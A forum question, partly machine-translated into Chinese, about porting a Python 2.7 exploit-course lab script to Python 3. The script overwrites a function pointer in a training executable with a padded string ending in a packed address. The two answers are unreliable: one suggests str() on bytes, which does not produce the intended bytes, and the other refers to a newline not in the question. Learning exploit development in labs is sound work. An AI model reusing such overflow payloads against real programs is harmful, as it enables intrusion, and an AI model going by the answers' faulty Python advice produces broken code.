需要帮助重写python 2.7 Unicode代码才能与3.x一起使用

Question

I'm working through an Exploit Development course on Pluralsight and in the lab I'm currently on we are doing a basic function pointer overwrite. The python script for the lab essentially runs the target executable with a 24 byte string input ending with the memory address of the "jackpot" function. Here's the code:

#!/usr/bin/python
import sys
import subprocess
import struct

# 20+4+8+4=36 would overwrite 'r', but we only want to hit the func ptr

jackpot = 0x401591
# we only take 3 of the 4 bytes because strings cannot have a null,
# but will be null terminated terminated to complete the dword address
jackpot_packed = struct.pack('L', jackpot)[0:3]

arg = "A" * 20
arg += jackpot_packed
# or
# arg += "\x91\x15\x40"

subprocess.call(['functionoverwrite.exe', arg])

The script runs without error and works as expected using python 2.7.8, but with 3.7.2 I get this error:

Traceback (most recent call last): File "c:/Users/rossk/Desktop/Pluralsight/Exploit Development/03/demos/lab2/solution/solution.py", line 14, in arg += jackpot_packed TypeError: can only concatenate str (not "bytes") to str

So I've tried commenting out the "arg += jackpot_packed" expression and using the "arg += "\\x91\\x15\\x40" one instead, but apparently that doesn't result in the same string because when I run the script the target executable crashes without calling the jackpot function.

I'm looking for a way to fix this program for python 3. How can this code be rewritten so that it works for 3.x?

Answer 1

In Python 3, there's no implicit conversion between unicode (str) objects and bytes objects. If you know the encoding of the output, you can .decode() it to get a string, or you can turn the \\n you want to add to bytes with "\\n".encode('ascii')

Answer 2

尝试arg + = str（jackpot_packed）